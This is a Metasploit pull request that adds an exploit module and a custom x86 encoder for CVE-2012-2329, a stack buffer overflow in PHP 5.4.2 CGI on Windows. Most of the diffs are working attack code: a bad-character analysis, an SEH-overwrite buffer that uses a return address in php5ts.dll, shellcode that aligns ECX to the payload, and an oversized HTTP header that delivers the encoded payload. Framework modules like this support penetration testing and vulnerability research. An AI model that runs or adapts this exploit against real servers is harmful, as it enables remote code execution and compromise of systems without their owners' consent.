### PR TITLE
Added module plus encoder for CVE-2012-2329

### DIFF
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -106,6 +106,10 @@ class Encoder < Module
 		#
 		NonUpperUtf8Safe = "non_upper_utf8_safe"
 		#
+		# tolower safe underscore safe for CVE-2012-2329 - PHP CGI apache_request_headers bof
+		#
+		NonUpperUnderscoreSafe = "non_upper_underscore"
+		#
 		# May result in the generation of any characters
 		#
 		Unspecified = "unspecified"

--- a/modules/encoders/x86/avoid_underscore_tolower.rb
+++ b/modules/encoders/x86/avoid_underscore_tolower.rb
@@ -1,0 +1,222 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Encoder
+
+	#
+	# In some cases, payloads can be an invalid size that is incompatible with
+	# this encoder
+	#
+	class InvalidPayloadSizeException < ::Exception
+		def initialize(msg)
+			@msg = msg
+		end
+
+		def to_s
+			@msg
+		end
+	end
+
+	# This encoder has a manual ranking because it should only be used in cases
+	# where information has been explicitly supplied, like the BufferOffset.
+	Rank = ManualRanking
+
+	# This encoder is a modified version of the sakpe's Avoid UTF8/tolower one, having
+	# into account the next set of bad chars for CVE-2012-2329 exploitation:
+	# "\x00\x0d\x0a"
+	# "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
+	# "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5f"
+	# "\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e"
+	# "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
+	def initialize
+		super(
+			'Name'             => 'Avoid underscore/tolower',
+			'Version'          => '$Revision$',
+			'Description'      => %q{
+					Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a
+				modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check
+				the documentation of the skape encoder before using it. As the original,
+				this encoder expects ECX pointing to the start of the encoded payload. Also
+				BufferOffset must be provided if needed.
+
+				The changes introduced are (1) avoid the use of the 0x5f byte (underscore) in
+				because it is a badchar in the CVE-2012-2329 case and (2) optimize the
+				transformation block, having into account more relaxed conditions about bad
+				characters greater than 0x80.
+			},
+			'Author'           =>
+				[
+					'skape', # avoid_utf8_lower Author
+					'juan vazquez' # Adapted to be usable on CVE-2012-2329
+				],
+			'Arch'             => ARCH_X86,
+			'License'          => MSF_LICENSE,
+			'EncoderType'      => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+			'Decoder'          =>
+				{
+					'KeySize'    => 4,
+					'BlockSize'  => 4,
+				})
+	end
+
+	#
+	# Returns the decoder stub that is adjusted for the size of
+	# the buffer being encoded
+	#
+	def decoder_stub(state)
+		len = ((state.buf.length + 3) & (~0x3)) / 4
+
+		# Grab the number of additional bytes that we need to adjust by in order
+		# to get the context register to point immediately after the stub header
+		off = (datastore['BufferOffset'] || 0).to_i
+
+		# Check to make sure that the length is a valid size
+
+		if is_badchar(state, len)
+			raise InvalidPayloadSizeException.new("The payload being encoded is of an incompatible size (#{len} bytes)")
+		end
+
+		decoder =
+			"\x6a" + [len].pack('C')      +  # push len
+			"\x6b\x3c\x24\x09"            +  # imul 0x9
+			"\x60"                        +  # pusha
+			"\x03\x0c\x24"                +  # add ecx, [esp]
+			"\x6a" + [0x11+off].pack('C') +  # push byte 0x11 + off
+			"\x03\x0c\x24"                +  # add ecx, [esp]
+			"\x6a\x04"                       # push byte 0x4
+
+		# encoded sled
+		state.context = ''
+
+		return decoder
+	end
+
+	def encode_block(state, block)
+		buf = try_add(state, block)
+
+		if (buf.nil?)
+			buf = try_sub(state, block)
+		end
+
+		if (buf.nil?)
+			raise BadcharError.new(state.encoded, 0, 0, 0)
+		end
+
+		buf
+	end
+
+	#
+	# Appends the encoded context portion.
+	#
+	def encode_end(state)
+		state.encoded += state.context
+	end
+
+	#
+	# Generate the instructions that will be used to produce a valid
+	# block after decoding using the sub instruction in conjunction with
+	# two underscore/tolower safe values.
+	#
+	def try_sub(state, block)
+		buf = "\x81\x29";
+		vbuf  = ''
+		ctx   = ''
+		carry = 0
+
+		block.each_byte { |b|
+
+			x          = 0
+			y          = 0
+			attempts   = 0
+			prev_carry = carry
+
+			begin
+				carry = prev_carry
+
+				if (b > 0x80)
+					diff  = 0x100 - b
+					y     = rand(0x80 - diff - 1).to_i + 1
+					x     = (0x100 - (b - y + carry))
+					carry = 1
+				else
+					diff  = 0x7f - b
+					x     = rand(diff - 1) + 1
+					y     = (b + x + carry) & 0xff
+					carry = 0
+				end
+
+				attempts += 1
+
+				# Lame.
+				return nil if (attempts > 512)
+
+			end while (is_badchar(state, x) or is_badchar(state, y))
+
+			vbuf += [x].pack('C')
+			ctx  += [y].pack('C')
+		}
+
+		buf += vbuf + "\x03\x0c\x24"
+
+		state.context += ctx
+
+		return buf
+
+	end
+
+	#
+	# Generate instructions that will be used to produce a valid block after
+	# decoding using the add instruction in conjunction with two underscore/tolower
+	# safe values.
+	#
+	def try_add(state, block)
+		buf  = "\x81\x01"
+		vbuf = ''
+		ctx  = ''
+
+		block.each_byte { |b|
+
+			attempts = 0
+
+			begin
+				if b == 0x00
+					xv = rand(b - 1) # badchars will kill 0x00 if it isn't allowed
+				else
+					xv = rand(b - 1) + 1
+				end
+
+
+				attempts += 1
+
+				# Lame.
+				return nil if (attempts > 512)
+
+			end while (is_badchar(state, xv) or is_badchar(state, b - xv))
+
+			vbuf += [xv].pack('C')
+			ctx  += [b - xv].pack('C')
+		}
+
+		buf += vbuf + "\x03\x0c\x24"
+
+		state.context += ctx
+
+		return buf
+	end
+
+	def is_badchar(state, val)
+		(val >= 0x41 and val <= 0x5a) or Rex::Text.badchar_index([val].pack('C'), state.badchars)
+	end
+
+end

--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Seh
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -46,18 +47,22 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => true,
 			'Payload'        =>
 				{
-					'Space'    => 508, # Max length our encoder is able to handle
-					'DisableNops'    => true,
-					'EncoderType' => Msf::Encoder::Type::Raw,
+					'Space'       => 1321,
+					'DisableNops' => true,
+					'BadChars'    => "\x00\x0d\x0a\x5f\x80\x8e\x9e\x9f" + (0x41..0x5a).to_a.pack("C*") + (0x82..0x8c).to_a.pack("C*") + (0x91..0x9c).to_a.pack("C*"),
+					'EncoderType' => Msf::Encoder::Type::NonUpperUnderscoreSafe,
+					'EncoderOptions' =>
+						{
+							'BufferOffset' => 0x0
+						}
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
 					['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
 						{
-							'Ret' => 0x1002aa79, # ppr from php5ts.dll
-							'Offset' => 1332,
-							'Space' => 1321
+							'Ret'    => 0x1002aa79, # ppr from php5ts.dll
+							'Offset' => 1332
 						}
 					],
 				],
@@ -74,35 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		print_status("Trying target #{target.name}...")
 
-		# Badchars analysis
-		my_badchars = "\x00\x0d\x0a\x5f"
-		my_badchars << (0x41..0x5a).to_a.pack("C*")
-		my_badchars << "\x80"
-		my_badchars << (0x82..0x8c).to_a.pack("C*")
-		my_badchars << "\x8e"
-		my_badchars << (0x91..0x9c).to_a.pack("C*")
-		my_badchars << "\x9e\x9f"
-
-		# Avoid a length which results in a badchar
-		my_payload = ""
-		if payload.raw.length > 256 and payload.raw.length < 364
-			my_payload << make_nops(364 - payload.raw.length)
-		end
-		my_payload << payload.raw
-
-		# Build the SEH handler
-		seh = Rex::Exploitation::Seh.new(my_badchars)
-
-		# Try to encode the payload to avoid badchars
-		enc = framework.encoders.create('x86/avoid_underscore_tolower')
-		enc.datastore.import_options_from_hash({ 'BufferOffset' => 0x0 })
-		my_payload = enc.encode(my_payload, my_badchars, nil, platform)
-
-		if my_payload.length > target['Space']
-			print_error("The encoded payload exceeds the available space")
-			return
-		end
-
 		# Make ECX point to the start of the encoded payload
 		align_ecx = "pop esi\n" # "\x5e"
 		align_ecx << "add esi, -#{target['Offset']+8+5-11}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
@@ -110,15 +86,15 @@ class Metasploit3 < Msf::Exploit::Remote
 		align_ecx << "add ecx, esi" # "\x01\xf1"
 		sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
 		# Encoded payload
-		sploit << my_payload
+		sploit << payload.encoded
 		# Padding if needed
-		sploit << rand_text(1332-sploit.length, my_badchars)
+		sploit << rand_text(target['Offset']-sploit.length)
 		# SEH handler overwrite
-		sploit << seh.generate_static_seh_record(target.ret)
+		sploit << generate_seh_record(target.ret)
 		# Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
 		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
 		# Make it crash
-		sploit << rand_text(4096 - sploit.length, my_badchars)
+		sploit << rand_text(4096 - sploit.length)
 
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
@@ -134,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method'       => 'GET',
 			'headers'      =>
 			{
-				"HTTP_X_#{rand_text_alpha_upper(4)}" => sploit,
+				"HTTP_X_#{rand_text_alpha_lower(4)}" => sploit,
 			}
 		})
 

--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -1,0 +1,148 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PHP apache_request_headers Function Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack based buffer overflow in the CGI version of PHP
+				5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the
+				HTTP headers.
+
+					This module has been tested against the thread safe version of PHP 5.4.2,
+				from "windows.php.net", running with Apache 2.2.22 from "apachelounge.com".
+			},
+			'Author'         =>
+				[
+					'Vincent Danen', # Vulnerability discovery
+					'juan vazquez', # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2012-2329'],
+					[ 'OSVDB', '82215'],
+					[ 'BID', '53455'],
+					[ 'URL', 'http://www.php.net/archive/2012.php#id2012-05-08-1' ],
+					[ 'URL', 'http://www.php.net/ChangeLog-5.php#5.4.3'],
+					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=820000' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 508, # Max length our encoder is able to handle
+					'DisableNops'    => true,
+					'EncoderType' => Msf::Encoder::Type::Raw,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe',
+						{
+							'Ret' => 0x1002aa79, # ppr from php5ts.dll
+							'Offset' => 1332,
+							'Space' => 1321
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'May 08 2012'))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The URI path to the php using apache_request_headers', '/php/test.php']),
+			], self.class)
+
+	end
+
+	def exploit
+		print_status("Trying target #{target.name}...")
+
+		# Badchars analysis
+		my_badchars = "\x00\x0d\x0a\x5f"
+		my_badchars << (0x41..0x5a).to_a.pack("C*")
+		my_badchars << "\x80"
+		my_badchars << (0x82..0x8c).to_a.pack("C*")
+		my_badchars << "\x8e"
+		my_badchars << (0x91..0x9c).to_a.pack("C*")
+		my_badchars << "\x9e\x9f"
+
+		# Avoid a length which results in a badchar
+		my_payload = ""
+		if payload.raw.length > 256 and payload.raw.length < 364
+			my_payload << make_nops(364 - payload.raw.length)
+		end
+		my_payload << payload.raw
+
+		# Build the SEH handler
+		seh = Rex::Exploitation::Seh.new(my_badchars)
+
+		# Try to encode the payload to avoid badchars
+		enc = framework.encoders.create('x86/avoid_underscore_tolower')
+		enc.datastore.import_options_from_hash({ 'BufferOffset' => 0x0 })
+		my_payload = enc.encode(my_payload, my_badchars, nil, platform)
+
+		if my_payload.length > target['Space']
+			print_error("The encoded payload exceeds the available space")
+			return
+		end
+
+		# Make ECX point to the start of the encoded payload
+		align_ecx = "pop esi\n" # "\x5e"
+		align_ecx << "add esi, -#{target['Offset']+8+5-11}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
+		align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
+		align_ecx << "add ecx, esi" # "\x01\xf1"
+		sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
+		# Encoded payload
+		sploit << my_payload
+		# Padding if needed
+		sploit << rand_text(1332-sploit.length, my_badchars)
+		# SEH handler overwrite
+		sploit << seh.generate_static_seh_record(target.ret)
+		# Call back "\xE8" + 4 bytes imm (ex: "\xBF\xFA\xFF\xFF")
+		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['Offset']+8}").encode_string
+		# Make it crash
+		sploit << rand_text(4096 - sploit.length, my_badchars)
+
+		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
+
+		uri = target_uri.path
+
+		if target_uri.query and not target_uri.query.empty?
+			uri << "?"
+			uri << target_uri.query
+		end
+
+		res = send_request_cgi({
+			'uri'          => uri,
+			'method'       => 'GET',
+			'headers'      =>
+			{
+				"HTTP_X_#{rand_text_alpha_upper(4)}" => sploit,
+			}
+		})
+
+		if res and res.code == 500
+			print_status "We got a 500 error code. Even without a session it could be an exploitation signal!"
+		end
+
+		handler
+	end
+end
+

--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Make ECX point to the start of the encoded payload
 		align_ecx = "pop esi\n" # "\x5e"
-		align_ecx << "add esi, -#{target['Offset']+8+5-11}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
+		esi_alignment = target['Offset'] + # Space from the start of align_ecx to nseh handler
+			8 + # len(nseh + seh)
+			5 - # len(call back)
+			11 # len(align_ecx)
+		align_ecx << "add esi, -#{esi_alignment}\n" # "\x81\xC6" + 4 bytes imm (ex: "\xCA\xFA\xFF\xFF")
 		align_ecx << "sub ecx, ecx\n" # "\x29\xC9"
 		align_ecx << "add ecx, esi" # "\x01\xf1"
 		sploit = Metasm::Shellcode.assemble(Metasm::Ia32.new, align_ecx).encode_string
@@ -98,15 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
-		uri = target_uri.path
-
-		if target_uri.query and not target_uri.query.empty?
-			uri << "?"
-			uri << target_uri.query
-		end
-
 		res = send_request_cgi({
-			'uri'          => uri,
+			'uri'          => target_uri.to_s,
 			'method'       => 'GET',
 			'headers'      =>
 			{


### PR DESCRIPTION
Added module for CVE-2012-2329 PHP CGI apache_request_headers Buffer Overflow.

Tested with PHP-5.4.2 (thread safe version) from windows.php.net and Apache 2.2.22 from Apache Lounge (http://www.apachelounge.com/).

Still no DEP bypass available. Searching for a reliable stackpivot.

This module has needed his own encoder because of the specific badchar "0x5f" (underscore) which makes it incompatible with the available "avoid tolower" encoders in msf.
